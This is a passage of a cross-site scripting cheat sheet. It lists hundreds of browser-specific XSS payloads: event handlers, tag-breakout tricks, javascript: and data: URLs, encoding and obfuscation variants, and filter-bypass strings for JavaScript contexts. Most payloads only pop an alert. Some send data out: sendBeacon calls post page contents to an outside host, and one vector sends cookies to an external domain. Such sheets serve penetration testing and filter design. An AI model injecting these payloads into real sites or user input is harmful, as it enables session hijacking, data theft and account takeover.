<xss oncut=alert(1) value="XSS" autofocus tabindex=1 style=display:block>test
ondblclick
Triggered when double clicking the element

<xss ondblclick="alert(1)" autofocus tabindex=1 style=display:block>test</xss>
ondrag
Triggered dragging the element

<xss draggable="true" ondrag="alert(1)" style=display:block>test</xss>
ondragend
Triggered dragging is finished on the element

<xss draggable="true" ondragend="alert(1)" style=display:block>test</xss>
ondragenter
Requires a mouse drag

<xss draggable="true" ondragenter="alert(1)" style=display:block>test</xss>
ondragexit
Triggered when dragging the element

<xss draggable="true" ondragexit="alert(1)" style=display:block>test</xss>
ondragleave
Requires a mouse drag

<xss draggable="true" ondragleave="alert(1)" style=display:block>test</xss>
ondragover
Triggered dragging over an element

<div draggable="true" contenteditable>drag me</div><xss ondragover=alert(1) contenteditable style=display:block>drop here</xss>
ondragstart
Requires a mouse drag

<xss draggable="true" ondragstart="alert(1)" style=display:block>test</xss>
ondrop
Triggered dropping a draggable element

<div draggable="true" contenteditable>drag me</div><xss ondrop=alert(1) contenteditable style=display:block>drop here</xss>
ondurationchange
Fires when duration changes

<video controls ondurationchange=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
onend
Fires when a svg animation ends

<svg><animate onend=alert(1) attributeName=x dur=1s>
onended
Fires when the resource is finished playing

<video controls autoplay onended=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onerror
Fires when the resource fails to load or causes an error

<body onerror=alert(1) onload=/>
onfinish
Fires when the marquee finishes

<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee>
onfocus
Fires when the element has focus

<input autofocus onfocus=alert(1)>
onfocusin
Fires when the element has focus

<input autofocus onfocusin=alert(1)>
onfocusout
Fires when an element loses focus

<xss onfocusout=alert(1) autofocus tabindex=1 style=display:block>test</xss><input value=clickme>
onformdata
Triggered when a form is submitted

<form onformdata="alert(1)"><button>Click</button></form>
onfullscreenchange
Fires when a video changes full screen status

<video onfullscreenchange=alert(1) src=validvideo.mp4 controls>
onhashchange
Fires if the hash changes

<body onhashchange="print()">
oninput
Requires as change of value

<input oninput=alert(1) value=xss>
oninvalid
Requires a form submission with an element that does not satisfy its constraints such as a required attribute.

<form><input oninvalid=alert(1) required><input type=submit>
onkeydown
Triggered when a key is pressed

<xss onkeydown="alert(1)" contenteditable style=display:block>test</xss>
onkeypress
Triggered when a key is pressed

<xss onkeypress="alert(1)" contenteditable style=display:block>test</xss>
onkeyup
Triggered when a key is released

<xss onkeyup="alert(1)" contenteditable style=display:block>test</xss>
onload
Fires when the element is loaded

<body onload=alert(1)>
onloadeddata
Fires when the first frame is loaded

<video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onloadedmetadata
Fires when the meta data is loaded

<video autoplay onloadedmetadata=alert(1)> <source src="validvideo.mp4" type="video/mp4"></video>
onloadstart
Triggered video is loaded

<video onloadstart="alert(1)"><source></*>
onmessage
Fires when message event is received from a postMessage call

<body onmessage=print()>
onmousedown
Triggered when the mouse is pressed

<xss onmousedown="alert(1)" style=display:block>test</xss>
onmouseenter
Triggered when the mouse is hovered over the element

<xss onmouseenter="alert(1)" style=display:block>test</xss>
onmouseleave
Triggered when the mouse is moved away from the element

<xss onmouseleave="alert(1)" style=display:block>test</xss>
onmousemove
Requires mouse movement

<xss onmousemove="alert(1)" style=display:block>test</xss>
onmouseout
Triggered when the mouse is moved away from the element

<xss onmouseout="alert(1)" style=display:block>test</xss>
onmouseover
Requires a hover over the element

<xss onmouseover="alert(1)" style=display:block>test</xss>
onmouseup
Triggered when the mouse button is released

<xss onmouseup="alert(1)" style=display:block>test</xss>
onmousewheel
Fires when the mousewheel scrolls

<xss onmousewheel=alert(1) style=display:block>requires scrolling
onmozfullscreenchange
Fires when a video changes full screen status

<video onmozfullscreenchange=alert(1) src=validvideo.mp4 controls>
onpagehide
Fires when the page is changed

<body onpagehide=navigator.sendBeacon('//https://ssl.example.com/', document.body.innerHTML)>
onpageshow
Fires when the page is shown

<body onpageshow=alert(1)>
onpaste
Requires you paste a piece of text

<input onpaste=alert(1) value="" autofocus>
onpause
Requires clicking the element to pause

<video autoplay controls onpause=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onplay
Fires when the resource is played

<video autoplay onplay=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onplaying
Fires the resource is playing

<video autoplay onplaying=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onpointerdown
Fires when the mouse down

<xss onpointerdown=alert(1) style=display:block>XSS</xss>
onpointerenter
Fires when the mouseenter

<xss onpointerenter=alert(1) style=display:block>XSS</xss>
onpointerleave
Fires when the mouseleave

<xss onpointerleave=alert(1) style=display:block>XSS</xss>
onpointermove
Fires when the mouse move

<xss onpointermove=alert(1) style=display:block>XSS</xss>
onpointerout
Fires when the mouse out

<xss onpointerout=alert(1) style=display:block>XSS</xss>
onpointerover
Fires when the mouseover

<xss onpointerover=alert(1) style=display:block>XSS</xss>
onpointerrawupdate
Fires when the pointer changes

<xss onpointerrawupdate=alert(1) style=display:block>XSS</xss>
onpointerup
Fires when the mouse up

<xss onpointerup=alert(1) style=display:block>XSS</xss>
onpopstate
Fires when the history changes

<body onpopstate=print()>
onprogress
Fires when the video/audio begins downloading

<video controls onprogress=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
onratechange
Fires when the speed of the video changes

<video controls autoplay onratechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onrepeat
Fires when a svg animation repeats

<svg><animate onrepeat=alert(1) attributeName=x dur=1s repeatCount=2 />
onreset
Requires a click

<form onreset=alert(1)><input type=reset>
onresize
Fires when the window is resized

<body onresize="print()">
onscroll
Fires when the page scrolls

<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
onscrollend
Fires when the scrolling to the end of the element

<xss onscrollend=alert(1) style="display:block;overflow:auto;border:1px dashed;width:500px;height:100px;"><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>
onsearch
Fires when a form is submitted and the input has a type attribute of search

<form><input type=search onsearch=alert(1) value="Hit return" autofocus>
onseeked
Requires clicking the element timeline

<audio autoplay controls onseeked=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
onseeking
Requires clicking the element timeline

<video autoplay controls onseeking=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onselect
Requires you select text

<input onselect=alert(1) value="XSS" autofocus>
onselectionchange
Fires when text selection is changed on the page

<body onselectionchange=alert(1)>select some text
onselectstart
Fires when beginning a text selection

<body onselectstart=alert(1)>select some text
onshow
Fires context menu is shown

<div contextmenu=xss><p>Right click<menu type=context id=xss onshow=alert(1)></menu></div>
onstart
Fires when the marquee starts

<marquee onstart=alert(1)>XSS</marquee>
onsubmit
Requires a form submission

<form onsubmit=alert(1)><input type=submit>
onsuspend
Fires when the video/audio when the data loading is suspended

<video controls onsuspend=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
ontimeupdate
Fires when the timeline is changed

<video controls autoplay ontimeupdate=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
ontoggle
Fires when the details tag is expanded

<details ontoggle=alert(1) open>test</details>
ontoggle(popover)
Fires when the a popop element is toggled

<button popovertarget=x>Click me</button><xss ontoggle=alert(1) popover id=x>XSS</xss>
ontouchend
Fires when the touch screen, only mobile device

<body ontouchend=alert(1)>
ontouchmove
Fires when the touch screen and move, only mobile device

<body ontouchmove=alert(1)>
ontouchstart
Fires when the touch screen, only mobile device

<body ontouchstart=alert(1)>
ontransitioncancel
Fires when a CSS transition cancels

<style>:target {color: red;}</style><xss id=x style="transition:color 10s" ontransitioncancel=print()></xss>
ontransitionend
Fires when a CSS transition ends

<xss id=x style="transition:outline 1s" ontransitionend=alert(1) tabindex=1></xss>
ontransitionrun
Fires when a CSS transition begins

<style>:target {transform: rotate(180deg);}</style><xss id=x style="transition:transform 2s" ontransitionrun=print()></xss>
ontransitionstart
Fires when a CSS transition starts

<style>:target {color:red;}</style><xss id=x style="transition:color 1s" ontransitionstart=alert(1)></xss>
onunhandledrejection
Fires when a promise isn't handled

<body onunhandledrejection=alert(1)><script>fetch('//xyz')</script>
onunload
Fires when the page is unloaded

<svg onunload=navigator.sendBeacon('//https://ssl.example.com/', document.body.innerHTML)>
onvolumechange
Requires volume adjustment

<video autoplay controls onvolumechange=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
onwebkitanimationend
Fires when a CSS animation ends

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationend="alert(1)"></xss>
onwebkitanimationiteration
Fires when a CSS animation repeats

<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onwebkitanimationiteration="alert(1)"></xss>
onwebkitanimationstart
Fires when a CSS animation starts

<style>@keyframes x{}</style><xss style="animation-name:x" onwebkitanimationstart="alert(1)"></xss>
onwebkittransitionend
Fires when a CSS transition ends

<style>:target {color:red;}</style><xss id=x style="transition:color 1s" onwebkittransitionend=alert(1)></xss>
onwheel
Fires when you use the mouse wheel

<body onwheel=alert(1)>
 
Consuming tags
<noembed><img title="</noembed><img src onerror=alert(1)>"></noembed>
Noembed consuming tag

chrome,firefox,safari

<noscript><img title="</noscript><img src onerror=alert(1)>"></noscript>
Noscript consuming tag

chrome,firefox,safari

<style><img title="</style><img src onerror=alert(1)>"></style>
Style consuming tag

chrome,firefox,safari

<script><img title="</script><img src onerror=alert(1)>"></script>
Script consuming tag

chrome,firefox,safari

<iframe><img title="</iframe><img src onerror=alert(1)>"></iframe>
iframe consuming tag

chrome,firefox,safari

<xmp><img title="</xmp><img src onerror=alert(1)>"></xmp>
xmp consuming tag

chrome,firefox,safari

<textarea><img title="</textarea><img src onerror=alert(1)>"></textarea>
textarea consuming tag

chrome,firefox,safari

<noframes><img title="</noframes><img src onerror=alert(1)>"></noframes>
noframes consuming tag

chrome,firefox,safari

<title><img title="</title><img src onerror=alert(1)>"></title>
Title consuming tag

chrome,firefox,safari

 
Restricted characters
<script>onerror=alert;throw 1</script>
No parentheses using exception handling

chrome,firefox,safari

<script>{onerror=alert}throw 1</script>
No parentheses using exception handling no semi colons

chrome,firefox,safari

<script>throw onerror=alert,1</script>
No parentheses using exception handling no semi colons using expressions

chrome,firefox,safari

<script>throw onerror=eval,'=alert\x281\x29'</script>
No parentheses using exception handling and string eval on Chrome / Edge

chrome

<script>throw onerror=eval,'alert\x281\x29'</script>
No parentheses using exception handling and string eval on Safari

safari

<script>{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:1,message:'alert\x281\x29'}</script>
No parentheses using exception handling and object eval on Firefox

firefox

<script>throw onerror=eval,e=new Error,e.message='alert\x281\x29',e</script>
No parentheses using exception handling and object eval on Firefox / Safari

firefox,safari

<script>throw onerror=Uncaught=eval,e=new Error,e.message='/*'+location.hash,!!window.InstallTrigger?e:e.message</script>
No parentheses using exception handling and location hash eval on all browsers

chrome,firefox,safari

<script>throw{},onerror=Uncaught=eval,h=location.hash,e={lineNumber:1,columnNumber:1,fileName:0,message:h[2]+h[1]+h},!!window.InstallTrigger?e:e.message</script>
No parentheses, no quotes, no spaces using exception handling and location hash eval on all browsers

chrome,firefox,safari

<script>throw/x/,onerror=Uncaught=eval,h=location.hash,e=Error,e.lineNumber=e.columnNumber=e.fileName=e.message=h[2]+h[1]+h,!!window.InstallTrigger?e:e.message</script>
No parentheses, no quotes, no spaces, no curly brackets using exception handling and location hash eval on all browsers

chrome,firefox,safari

<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>
No parentheses using ES6 hasInstance and instanceof with eval

chrome,firefox,safari

<script>'alert\x281\x29'instanceof{[Symbol['hasInstance']]:eval}</script>
No parentheses using ES6 hasInstance and instanceof with eval without .

chrome,firefox,safari

<script>location='javascript:alert\x281\x29'</script>
No parentheses using location redirect

chrome,firefox,safari

<script>location=name</script>
No parentheses using location redirect no strings

chrome,firefox,safari

<script>alert`1`</script>
No parentheses using template strings

chrome,firefox,safari

<script>new Function`X${document.location.hash.substr`1`}`</script>
No parentheses using template strings and location hash

chrome,firefox,safari

<script>Function`X${document.location.hash.substr`1`}```</script>
No parentheses or spaces, using template strings and location hash

chrome,firefox,safari

<video><source onerror=location=/\02.rs/+document.cookie>
XSS cookie exfiltration without parentheses, backticks or quotes

chrome,firefox,safari

<svg onload=alert(1)
XSS without greater than

chrome,firefox,safari

<svg onload=alert(1)<!--
XSS without greater using a HTML comment

chrome,firefox,safari

<script>throw[onerror]=[alert],1</script>
Array based destructuring using onerror

chrome,firefox,safari

<script>var{a:onerror}={a:alert};throw 1</script>
Destructuring using onerror

chrome,firefox,safari

<script>var{haha:onerror=alert}=0;throw 1</script>
Destructuring using default values and onerror

chrome,firefox,safari

<script>window.name='javascript:alert(1)';</script><svg onload=location=name>
Vector using window.name

chrome,firefox,safari

<script>window.name='javascript:alert(1)';function blah(){} blah(""+{a:location=name}+"")</script>
Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using object literal

chrome,firefox,safari

<script>window.name='javascript:alert(1)';function blah(){} blah(""+new class b{toString=e=>location=name}+"")</script>
Avoiding Invalid left-hand side in assignment without `, (), ?, [], or , using new class

chrome,firefox,safari

 
Protocols
<iframe src="javascript:alert(1)">
Iframe src attribute JavaScript protocol

chrome,firefox,safari

<object data="javascript:alert(1)">
Object data attribute with JavaScript protocol

firefox

<embed src="javascript:alert(1)">
Embed src attribute with JavaScript protocol

firefox

<a href="javascript:alert(1)">XSS</a>
A standard JavaScript protocol

chrome,firefox,safari

<a href="JaVaScript:alert(1)">XSS</a>
The protocol is not case sensitive

chrome,firefox,safari

<a href=" javascript:alert(1)">XSS</a>
Characters \x01-\x20 are allowed before the protocol

chrome,firefox,safari

<a href="javas cript:alert(1)">XSS</a>
Characters \x09,\x0a,\x0d are allowed inside the protocol

chrome,firefox,safari

<a href="javascript :alert(1)">XSS</a>
Characters \x09,\x0a,\x0d are allowed after protocol name before the colon

chrome,firefox,safari

<svg><a xlink:href="javascript:alert(1)"><text x="20" y="20">XSS</text></a>
Xlink namespace inside SVG with JavaScript protocol

chrome,firefox,safari

<svg><animate xlink:href=#xss attributeName=href values=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using values

chrome,firefox,safari

<svg><animate xlink:href=#xss attributeName=href from=javascript:alert(1) to=1 /><a id=xss><text x=20 y=20>XSS</text></a>
SVG animate tag using to

chrome,firefox,safari

<svg><set xlink:href=#xss attributeName=href from=? to=javascript:alert(1) /><a id=xss><text x=20 y=20>XSS</text></a>
SVG set tag

chrome,firefox,safari

<script src="data:text/javascript,alert(1)"></script>
Data protocol inside script src

chrome,firefox,safari

<svg><script href="data:text/javascript,alert(1)" />
SVG script href attribute without closing script tag

firefox

<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
SVG use element Chrome/Firefox

chrome,firefox

<script>import('data:text/javascript,alert(1)')</script>
Import statement with data URL

chrome,firefox,safari

<base href="javascript:/a/-alert(1)///////"><a href=../lol/safari.html>test</a>
Base tag with JavaScript protocol rewriting relative URLS

safari

<math><x href="javascript:alert(1)">blah
MathML makes any tag clickable

firefox

<form><button formaction=javascript:alert(1)>XSS
Button and formaction

chrome,firefox,safari

<form><input type=submit formaction=javascript:alert(1) value=XSS>
Input and formaction

chrome,firefox,safari

<form action=javascript:alert(1)><input type=submit value=XSS>
Form and action

chrome,firefox,safari

<svg><animate xlink:href=#xss attributeName=href dur=5s repeatCount=indefinite keytimes=0;0;1 values="https://example.com?&semi;javascript:alert(1)&semi;0" /><a id=xss><text x=20 y=20>XSS</text></a>
Animate tag with keytimes and multiple values

chrome,firefox,safari

<a href="javascript://%0aalert(1)">XSS</a>
JavaScript protocol with new line

chrome,firefox,safari

<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==#x" /></svg>
Data URL with use element and base64 encoded

chrome,firefox

<svg><use href="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" />
Data URL with use element

chrome,firefox

<svg><animate xlink:href="#x" attributeName="href" values="data:image/svg+xml,&lt;svg id='x' xmlns='http://www.w3.org/2000/svg'&gt;&lt;image href='1' onerror='alert(1)' /&gt;&lt;/svg&gt;#x" /><use id=x />
Animate tag with auto executing use element

chrome,firefox

<embed code=https://example.com width=500 height=500 type=text/html>
Embed supports code attribute

chrome

<object width=500 height=500 type=text/html><param name=url value=https://example.com>
Object tag supports param url

chrome

<object width=500 height=500 type=text/html><param name=code value=https://example.com>
Object tag supports param code

chrome

<object width=500 height=500 type=text/html><param name=movie value=https://example.com>
Object tag supports param movie

chrome

<object width=500 height=500 type=text/html><param name=src value=https://example.com>
Object tag supports param src

chrome

<script>location.protocol='javascript'</script>
Assignable protocol with location

chrome,safari

<a href="%0aalert(1)" onclick="protocol='javascript'">test</a>
Assignable protocol with anchor

chrome,safari

<script>navigation.navigate('javascript:alert(1)')</script>
Navigation navigate method

chrome

 
Encoding
%C0%BCscript>alert(1)</script> %E0%80%BCscript>alert(1)</script> %F0%80%80%BCscript>alert(1)</script> %F8%80%80%80%BCscript>alert(1)</script> %FC%80%80%80%80%BCscript>alert(1)</script>
Overlong UTF-8

chrome,firefox,safari

<script>\u0061lert(1)</script>
Unicode escapes

chrome,firefox,safari

<script>\u{61}lert(1)</script>
Unicode escapes ES6 style

chrome,firefox,safari

<script>\u{0000000061}lert(1)</script>
Unicode escapes ES6 style zero padded

chrome,firefox,safari

<script>eval('\x61lert(1)')</script>
Hex encoding JavaScript escapes

chrome,firefox,safari

<script>eval('\141lert(1)')</script> <script>eval('alert(\061)')</script> <script>eval('alert(\61)')</script>
Octal encoding

chrome,firefox,safari

<a href="&#106;avascript:alert(1)">XSS</a><a href="&#106avascript:alert(1)">XSS</a>
Decimal encoding with optional semi-colon

chrome,firefox,safari

<svg><script>&#97;lert(1)</script></svg> <svg><script>&#x61;lert(1)</script></svg> <svg><script>alert&NewLine;(1)</script></svg> <svg><script>x="&quot;,alert(1)//";</script></svg>
SVG script with HTML encoding

chrome,firefox,safari

<a href="&#0000106avascript:alert(1)">XSS</a>
Decimal encoding with padded zeros

chrome,firefox,safari

<a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding entities

chrome,firefox,safari

<a href="j&#x61vascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a> <a href="&#x6a avascript:alert(1)">XSS</a>
Hex encoding without semi-colon provided next character is not a-f0-9

chrome,firefox,safari

<a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding with padded zeros

chrome,firefox,safari

<a href="&#X6A;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive

chrome,firefox,safari

<a href="javascript&colon;alert(1)">XSS</a> <a href="java&Tab;script:alert(1)">XSS</a> <a href="java&NewLine;script:alert(1)">XSS</a> <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
HTML entities

chrome,firefox,safari

<a href="javascript:x='%27-alert(1)-%27';">XSS</a>
URL encoding

chrome,firefox,safari

<a href="javascript:x='&percnt;27-alert(1)-%27';">XSS</a>
HTML entities and URL encoding

chrome,firefox,safari

 
Obfuscation
<script src=data:text/javascript;base64,YWxlcnQoMSk=></script>
Data protocol inside script src with base64

chrome,firefox,safari

<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>
Data protocol inside script src with base64 and HTML entities

chrome,firefox,safari

<script src=data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d></script>
Data protocol inside script src with base64 and URL encoding

chrome,firefox,safari

<iframe srcdoc=&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;></iframe>
Iframe srcdoc HTML encoded

chrome,firefox,safari

<iframe src="javascript:'&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;'"></iframe>
Iframe JavaScript URL with HTML and URL encoding

chrome,firefox,safari

<svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
SVG script with unicode escapes and HTML encoding

chrome,firefox,safari

<img src=x onerror=location=atob`amF2YXNjcmlwdDphbGVydChkb2N1bWVudC5kb21haW4p`>
Img tag with base64 encoding

chrome,firefox,safari

 
WAF bypass global objects
';window['ale'+'rt'](window['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (window)

chrome,firefox,safari

';self['ale'+'rt'](self['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (self)

chrome,firefox,safari

';this['ale'+'rt'](this['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (this)

chrome,firefox,safari

';top['ale'+'rt'](top['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (top)

chrome,firefox,safari

';parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (parent)

chrome,firefox,safari

';frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (frames)

chrome,firefox,safari

';globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain']);//
XSS into a JavaScript string: string concatenation (globalThis)

chrome,firefox,safari

';window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (window)

chrome,firefox,safari

';self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (self)

chrome,firefox,safari

';this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (this)

chrome,firefox,safari

';top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (top)

chrome,firefox,safari

';parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (parent)

chrome,firefox,safari

';frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (frames)

chrome,firefox,safari

';globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain']);//
XSS into a JavaScript string: comment syntax (globalThis)

chrome,firefox,safari

';window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (window)

chrome,firefox,safari

';self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (self)

chrome,firefox,safari

';this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (this)

chrome,firefox,safari

';top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (top)

chrome,firefox,safari

';parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (parent)

chrome,firefox,safari

';frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (frames)

chrome,firefox,safari

';globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e']);//
XSS into a JavaScript string: hex escape sequence (globalThis)

chrome,firefox,safari

';window['\x65\x76\x61\x6c']('window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (window)

chrome,firefox,safari

';self['\x65\x76\x61\x6c']('self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (self)

chrome,firefox,safari

';this['\x65\x76\x61\x6c']('this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (this)

chrome,firefox,safari

';top['\x65\x76\x61\x6c']('top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (top)

chrome,firefox,safari

';parent['\x65\x76\x61\x6c']('parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (parent)

chrome,firefox,safari

';frames['\x65\x76\x61\x6c']('frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (frames)

chrome,firefox,safari

';globalThis['\x65\x76\x61\x6c']('globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT"))');//
XSS into a JavaScript string: hex escape sequence and base64 encoded string (globalThis)

chrome,firefox,safari

';window['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (window)

chrome,firefox,safari

';self['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (self)

chrome,firefox,safari

';this['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (this)

chrome,firefox,safari

';top['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (top)

chrome,firefox,safari

';parent['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (parent)

chrome,firefox,safari

';frames['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (frames)

chrome,firefox,safari

';globalThis['\141\154\145\162\164']('\130\123\123');//
XSS into a JavaScript string: octal escape sequence (globalThis)

chrome,firefox,safari

';window['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (window)

chrome,firefox,safari

';self['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (self)

chrome,firefox,safari

';this['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (this)

chrome,firefox,safari

';top['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (top)

chrome,firefox,safari

';parent['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (parent)

chrome,firefox,safari

';frames['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (frames)

chrome,firefox,safari

';globalThis['\u{0061}\u{006c}\u{0065}\u{0072}\u{0074}']('\u{0058}\u{0053}\u{0053}');//
XSS into a JavaScript string: unicode escape (globalThis)

chrome,firefox,safari

';window[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (window)

chrome,firefox,safari

';self[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (self)

chrome,firefox,safari

';this[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (this)

chrome,firefox,safari

';top[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (top)

chrome,firefox,safari

';parent[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (parent)

chrome,firefox,safari

';frames[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (frames)

chrome,firefox,safari

';globalThis[/al/.source+/ert/.source](/XSS/.source);//
XSS into a JavaScript string: RegExp source property (globalThis)

chrome,firefox,safari

